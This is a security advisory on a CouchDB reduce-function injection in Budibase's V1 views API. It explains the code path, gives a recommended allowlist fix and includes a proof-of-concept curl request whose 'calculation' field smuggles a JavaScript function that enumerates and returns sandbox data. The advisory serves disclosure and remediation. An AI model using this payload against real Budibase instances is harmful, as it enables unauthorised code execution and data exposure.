Budibase: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API

# Security Advisory: CouchDB Reduce Injection via Unsanitized Calculation Parameter in V1 Views API **Affected Software:** Budibase **Affected Component:** `packages/server/src/api/controllers/view/viewBuilder.ts`, `packages/server/src/api/routes/view.ts` **CWE:** CWE-94 (Improper Control of Generation of Code) **Discovery Date:** 2026-03-24 --- ## Summary The V1 Views API (`POST /api/views`) accepts a `calculation` parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal `SCHEMA_MAP` object defines the valid calculation types (`sum`, `count`, `stats`), no actual validation is performed against this map before the value is used in string interpolation. A user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried. --- ## Affected Component **Route:** `POST /api/views` (V1 legacy views endpoint) **File:** `packages/server/src/api/routes/view.ts`, line 45 ```js .post("/api/views", viewController.v1.save) ``` Note: This route has no Joi request body validator, unlike the V2 views endpoint which uses `viewValidator()`. **Vulnerable code:** `packages/server/src/api/controllers/view/viewBuilder.ts`, line 213 ```js const reduction = field && calculation ? { reduce: `_${calculation}` } : {} return { meta: { field, tableId, groupBy, filters, schema, calculation, ... }, map: `function (doc) { ... }`, ...reduction, // <-- unvalidated calculation string becomes CouchDB reduce } ``` --- ## Vulnerability Detail The `viewBuilder` function constructs a CouchDB design document view definition. It correctly sanitizes all inputs that flow into the `map` function string (using `JSON.stringify` for field names and a strict `TOKEN_MAP` allowlist for filter operators). However, the `calculation` parameter follows a different path: 1. User submits `calculation` via `POST /api/views` request body 2. No Joi validator is present on this V1 route 3. `viewBuilder` receives `calculation` as a raw string 4. It is interpolated as: `` reduce: `_${calculation}` `` 5. This reduce definition is saved to a CouchDB design document 6. When the view is queried, CouchDB evaluates the reduce value CouchDB's behavior for reduce functions: - Values starting with `_` followed by a known built-in (`_sum`, `_count`, `_stats`) are executed as native reducers - Any other value is treated as a **JavaScript function string** and executed in CouchDB's SpiderMonkey JS engine The `SCHEMA_MAP` object in the same file defines `sum`, `count`, and `stats` as valid keys, but this map is only used for schema construction — it is never used as an input validator for the `calculation` parameter. --- ## Steps to Reproduce **Prerequisites:** Authenticated session with Builder role permissions. **1. Send a crafted view creation request:** ```bash curl -X POST https://<budibase-instance>/api/views \ -H "Content-Type: application/json" \ -H "Cookie: <builder-session-cookie>" \ -d '{ "name": "test_view", "tableId": "<valid-table-id>", "field": "amount", "calculation": "stats\"); } function(keys,values,rereduce){ var data = \"\"; for(var i in this) { data += i + \"=\" + this[i] + \",\"; } return data; } //" }' ``` **2. Query the created view:** ```bash curl https://<budibase-instance>/api/views/test_view?group=true \ -H "Cookie: <builder-session-cookie>" ``` **3. Expected result:** The injected JavaScript function executes in CouchDB's JS context during reduce evaluation. The function can: - Enumerate objects available in the CouchDB sandbox - Access document data from the reduce `values` parameter - Return arbitrary data in the view response **Simplified test:** To verify the injection point without complex payloads: ```json { "name": "calc_test", "tableId": "<valid-table-id>", "field": "amount", "calculation": "INVALID_NOT_A_BUILTIN" } ``` This produces `reduce: "_INVALID_NOT_A_BUILTIN"`. CouchDB will reject this as neither a valid built-in nor a valid function, confirming that arbitrary strings reach the reduce evaluator. --- ## Impact - **Code execution:** Arbitrary JavaScript runs in CouchDB's SpiderMonkey sandbox - **Data access:** The reduce function receives all matching document values, allowing data exfiltration across the database - **Scope limitation:** CouchDB's JS sandbox prevents filesystem or network access — this is not OS-level RCE - **Authentication required:** Attacker must have Builder role, which already grants significant application access - **Persistence:** The injected reduce function persists in the design document and executes on every view query --- ## Recommended Fix Add an allowlist validation in `viewBuilder` before the reduce interpolation: ```typescript const VALID_CALCULATIONS = ["sum", "count", "stats"]; if (calculation && !VALID_CALCULATIONS.includes(calculation)) { throw new Error(`Invalid calculation type: ${calculation}`); } const reduction = field && calculation ? { reduce: `_${calculation}` } : {}; ``` Additionally, add a Joi validator to the V1 views route to match the V2 endpoint: ```typescript // In packages/server/src/api/routes/view.ts .post("/api/views", v1ViewValidator(), viewController.v1.save) ``` --- ## Additional Context The V2 views API (`POST /api/v2/views`) uses `viewValidator()` with Joi schema validation and a separate calculation handling path. This finding is specific to the V1 legacy endpoint which lacks equivalent input validation. The `map` function string in the same code is properly protected — all user inputs reaching it are escaped via `JSON.stringify()` or validated against a strict `TOKEN_MAP` allowlist. Only the `reduce` path is affected.